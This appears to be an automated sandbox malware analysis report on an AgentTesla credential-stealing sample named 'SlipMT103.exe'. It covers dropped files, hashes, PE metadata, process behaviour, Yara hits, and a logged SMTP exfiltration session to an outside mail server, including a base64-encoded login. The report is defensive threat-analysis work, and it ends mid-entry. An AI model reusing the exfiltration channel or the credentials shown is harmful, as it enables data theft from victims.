                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kprUEGC.exe.log
                                                                  Process:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2239
                                                                  Entropy (8bit):5.354287817410997
                                                                  Encrypted:false
                                                                  SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                                                                  MD5:913D1EEA179415C6D08FB255AE42B99D
                                                                  SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                                                                  SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                                                                  SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                  C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                  Process:C:\Users\user\Desktop\SlipMT103.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):512000
                                                                  Entropy (8bit):7.875344748787779
                                                                  Encrypted:false
                                                                  SSDEEP:12288:i2s0XixBFm+L0Cm6Zt5Q47S8oGsxBJxFmanL8FA:ls0Xi1FYCmCt5H/oXx3XmanQF
                                                                  MD5:5CBAC1B17CEF2BC95F5B18F87EC1DE49
                                                                  SHA1:85D362C8463EAAF6C071414F741F32BD4CC51F0C
                                                                  SHA-256:29291B4FB097C75DC3ECF4787A03175EC150319E9AB97A96B6084D1FE2DAE2A5
                                                                  SHA-512:418D44DC7F1FCA6C718AA6B61F545723ECD969E57CA05564703EB820888847833D22CA805F934F62F9461F278092E78060289ACA98CA2123DA51C0D85CEBA84D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 40%
                                                                  Reputation:low
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b.a..............0.................. ........@.. .......................@............@.................................x...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........e...u..........(...P.............................................{ ...*..{!...*..{"...*..{#...*..($.....} .....}!.....}"......}#...*....0..s........u........f.,`(%....{ ....{ ...o&...,H('....{!....{!...o(...,0()....{"....{"...o*...,.(+....{#....{#...o,...+..+..*..0..b....... .@d )UU.Z(%....{ ...o-...X )UU.Z('....{!...o....X )UU.Z()....{"...o/...X )UU.Z(+....{#...o0...X*...0...........r...p......%..{ ......%q.........-.&.+.......o1....%..{!......%q.........-.&.+.....
                                                                  C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe:Zone.Identifier
                                                                  Process:C:\Users\user\Desktop\SlipMT103.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                  C:\Windows\System32\drivers\etc\hosts
                                                                  Process:C:\Users\user\Desktop\SlipMT103.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):846
                                                                  Entropy (8bit):4.712383132025728
                                                                  Encrypted:false
                                                                  SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcB
                                                                  MD5:5B2D17233558878A82EE464D04F58B59
                                                                  SHA1:47EBFFCAD0B4C358DF0D6A06EF335CB6AAB0AB20
                                                                  SHA-256:5B036588BB4CAD3DE01DD04988AF705DA135D9F394755080CF9941444C09A542
                                                                  SHA-512:D2AEC9779EB8803514213A8E396B2F7C0B4A6F57DE1EE84E9DB0343EE5FF093E26BB70E0737A6681E21E88898EF5139969FF0B4B700CB6727979BD898FDBC85B
                                                                  Malicious:true
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: # Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1..127.0.0.1

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.875344748787779
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:SlipMT103.exe
                                                                  File size:512000
                                                                  MD5:5cbac1b17cef2bc95f5b18f87ec1de49
                                                                  SHA1:85d362c8463eaaf6c071414f741f32bd4cc51f0c
                                                                  SHA256:29291b4fb097c75dc3ecf4787a03175ec150319e9ab97a96b6084d1fe2dae2a5
                                                                  SHA512:418d44dc7f1fca6c718aa6b61f545723ecd969e57ca05564703eb820888847833d22ca805f934f62f9461f278092e78060289aca98ca2123da51c0d85ceba84d
                                                                  SSDEEP:12288:i2s0XixBFm+L0Cm6Zt5Q47S8oGsxBJxFmanL8FA:ls0Xi1FYCmCt5H/oXx3XmanQF
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b.a..............0.................. ........@.. .......................@............@................................

                                                                  File Icon

                                                                  Icon Hash:00828e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x47e4ca
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x619F62DF [Thu Nov 25 10:18:07 2021 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [ebp+0800000Eh], ch
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x7e4780x4f.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000x5dc.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x820000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000x7c4e00x7c600False0.899063677764data7.88568951342IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x800000x5dc0x600False0.436197916667data4.1768210155IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x820000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_VERSION0x800900x34cdata
                                                                  RT_MANIFEST0x803ec0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Version Infos

                                                                  DescriptionData
                                                                  Translation0x0000 0x04b0
                                                                  LegalCopyrightCopyright Rogers Peet
                                                                  Assembly Version8.0.6.0
                                                                  InternalNameIArraySortHelp.exe
                                                                  FileVersion5.6.0.0
                                                                  CompanyNameRogers Peet
                                                                  LegalTrademarks
                                                                  Comments
                                                                  ProductNameBiblan
                                                                  ProductVersion5.6.0.0
                                                                  FileDescriptionBiblan
                                                                  OriginalFilenameIArraySortHelp.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  11/25/21-18:04:37.058361TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49830587192.168.2.651.83.52.225

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 25, 2021 18:04:36.812948942 CET49830587192.168.2.651.83.52.225
                                                                  Nov 25, 2021 18:04:36.841125011 CET5874983051.83.52.225192.168.2.6
                                                                  Nov 25, 2021 18:04:36.841310978 CET49830587192.168.2.651.83.52.225
                                                                  Nov 25, 2021 18:04:36.883404970 CET5874983051.83.52.225192.168.2.6
                                                                  Nov 25, 2021 18:04:36.883806944 CET49830587192.168.2.651.83.52.225
                                                                  Nov 25, 2021 18:04:36.910588980 CET5874983051.83.52.225192.168.2.6
                                                                  Nov 25, 2021 18:04:36.911751032 CET49830587192.168.2.651.83.52.225
                                                                  Nov 25, 2021 18:04:36.939304113 CET5874983051.83.52.225192.168.2.6
                                                                  Nov 25, 2021 18:04:36.940468073 CET49830587192.168.2.651.83.52.225
                                                                  Nov 25, 2021 18:04:36.974989891 CET5874983051.83.52.225192.168.2.6
                                                                  Nov 25, 2021 18:04:36.975754023 CET49830587192.168.2.651.83.52.225
                                                                  Nov 25, 2021 18:04:37.002334118 CET5874983051.83.52.225192.168.2.6
                                                                  Nov 25, 2021 18:04:37.002614975 CET49830587192.168.2.651.83.52.225
                                                                  Nov 25, 2021 18:04:37.029778004 CET5874983051.83.52.225192.168.2.6
                                                                  Nov 25, 2021 18:04:37.030325890 CET49830587192.168.2.651.83.52.225
                                                                  Nov 25, 2021 18:04:37.056842089 CET5874983051.83.52.225192.168.2.6
                                                                  Nov 25, 2021 18:04:37.056906939 CET5874983051.83.52.225192.168.2.6
                                                                  Nov 25, 2021 18:04:37.058361053 CET49830587192.168.2.651.83.52.225
                                                                  Nov 25, 2021 18:04:37.058660030 CET49830587192.168.2.651.83.52.225
                                                                  Nov 25, 2021 18:04:37.059335947 CET49830587192.168.2.651.83.52.225
                                                                  Nov 25, 2021 18:04:37.059407949 CET49830587192.168.2.651.83.52.225
                                                                  Nov 25, 2021 18:04:37.085125923 CET5874983051.83.52.225192.168.2.6
                                                                  Nov 25, 2021 18:04:37.085825920 CET5874983051.83.52.225192.168.2.6
                                                                  Nov 25, 2021 18:04:37.086770058 CET5874983051.83.52.225192.168.2.6
                                                                  Nov 25, 2021 18:04:37.126884937 CET49830587192.168.2.651.83.52.225

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 25, 2021 18:04:36.609776974 CET6220853192.168.2.68.8.8.8
                                                                  Nov 25, 2021 18:04:36.690001965 CET53622088.8.8.8192.168.2.6

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Nov 25, 2021 18:04:36.609776974 CET192.168.2.68.8.8.80x3890Standard query (0)mail.aquanova.esA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Nov 25, 2021 18:04:36.690001965 CET8.8.8.8192.168.2.60x3890No error (0)mail.aquanova.es51.83.52.225A (IP address)IN (0x0001)

                                                                  SMTP Packets

                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                  Nov 25, 2021 18:04:36.883404970 CET5874983051.83.52.225192.168.2.6220-com335.raiolanetworks.es - ESMTP
                                                                  220- Do not use of this server to send unsolicited
                                                                  220 and/or bulk e-mails. These actions will be persecuted.
                                                                  Nov 25, 2021 18:04:36.883806944 CET49830587192.168.2.651.83.52.225EHLO 305090
                                                                  Nov 25, 2021 18:04:36.910588980 CET5874983051.83.52.225192.168.2.6250-com335.raiolanetworks.es Hello 305090 [84.17.52.63]
                                                                  250-SIZE 52428800
                                                                  250-8BITMIME
                                                                  250-DSN
                                                                  250-PIPELINING
                                                                  250-PIPE_CONNECT
                                                                  250-AUTH PLAIN LOGIN
                                                                  250-STARTTLS
                                                                  250 HELP
                                                                  Nov 25, 2021 18:04:36.911751032 CET49830587192.168.2.651.83.52.225AUTH login YWRtaW5pc3RyYWNpb25AYXF1YW5vdmEuZXM=
                                                                  Nov 25, 2021 18:04:36.939304113 CET5874983051.83.52.225192.168.2.6334 UGFzc3dvcmQ6
                                                                  Nov 25, 2021 18:04:36.974989891 CET5874983051.83.52.225192.168.2.6235 Authentication succeeded
                                                                  Nov 25, 2021 18:04:36.975754023 CET49830587192.168.2.651.83.52.225MAIL FROM:<administracion@aquanova.es>
                                                                  Nov 25, 2021 18:04:37.002334118 CET5874983051.83.52.225192.168.2.6250 OK
                                                                  Nov 25, 2021 18:04:37.002614975 CET49830587192.168.2.651.83.52.225RCPT TO:<administracion@aquanova.es>
                                                                  Nov 25, 2021 18:04:37.029778004 CET5874983051.83.52.225192.168.2.6250 Accepted
                                                                  Nov 25, 2021 18:04:37.030325890 CET49830587192.168.2.651.83.52.225DATA
                                                                  Nov 25, 2021 18:04:37.056906939 CET5874983051.83.52.225192.168.2.6354 Enter message, ending with "." on a line by itself
                                                                  Nov 25, 2021 18:04:37.059407949 CET49830587192.168.2.651.83.52.225.
                                                                  Nov 25, 2021 18:04:37.086770058 CET5874983051.83.52.225192.168.2.6250 OK id=1mqIAn-00HaMy-1V

                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  Analysis Process: SlipMT103.exe PID: 6388 Parent PID: 6084

                                                                  General

                                                                  Start time:18:02:42
                                                                  Start date:25/11/2021
                                                                  Path:C:\Users\user\Desktop\SlipMT103.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\SlipMT103.exe"
                                                                  Imagebase:0x680000
                                                                  File size:512000 bytes
                                                                  MD5 hash:5CBAC1B17CEF2BC95F5B18F87EC1DE49
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.360382819.0000000002AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.361078154.0000000003AFD000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.361078154.0000000003AFD000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.360569240.0000000002BBA000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  Analysis Process: SlipMT103.exe PID: 6456 Parent PID: 6388

                                                                  General

                                                                  Start time:18:02:45
                                                                  Start date:25/11/2021
                                                                  Path:C:\Users\user\Desktop\SlipMT103.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\SlipMT103.exe
                                                                  Imagebase:0x450000
                                                                  File size:512000 bytes
                                                                  MD5 hash:5CBAC1B17CEF2BC95F5B18F87EC1DE49
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.358186685.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.356758159.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.356758159.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.357240049.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.357240049.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.356357042.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.356357042.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.618546688.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.618546688.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.626792715.00000000027A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  Analysis Process: kprUEGC.exe PID: 2900 Parent PID: 3440

                                                                  General

                                                                  Start time:18:03:23
                                                                  Start date:25/11/2021
                                                                  Path:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe"
                                                                  Imagebase:0xee0000
                                                                  File size:512000 bytes
                                                                  MD5 hash:5CBAC1B17CEF2BC95F5B18F87EC1DE49
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.452252607.00000000043AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000002.452252607.00000000043AD000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.451118533.00000000033A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.451324743.000000000346B000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 40%, ReversingLabs
                                                                  Reputation:low

                                                                  Analysis Process: kprUEGC.exe PID: 988 Parent PID: 2900

                                                                  General

                                                                  Start time:18:03:27
                                                                  Start date:25/11/2021
                                                                  Path:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                  Imagebase:0x720000
                                                                  File size:512000 bytes
                                                                  MD5 hash:5CBAC1B17CEF2BC95F5B18F87EC1DE49
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.446727696.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000000.446727696.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.618566079.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000002.618566079.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.448106925.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000000.448106925.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.624222923.00000000029E1000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.444571373.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000000.444571373.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.445138730.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000000.445138730.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  Analysis Process: kprUEGC.exe PID: 6272 Parent PID: 3440

                                                                  General

                                                                  Start time:18:03:31
                                                                  Start date:25/11/2021
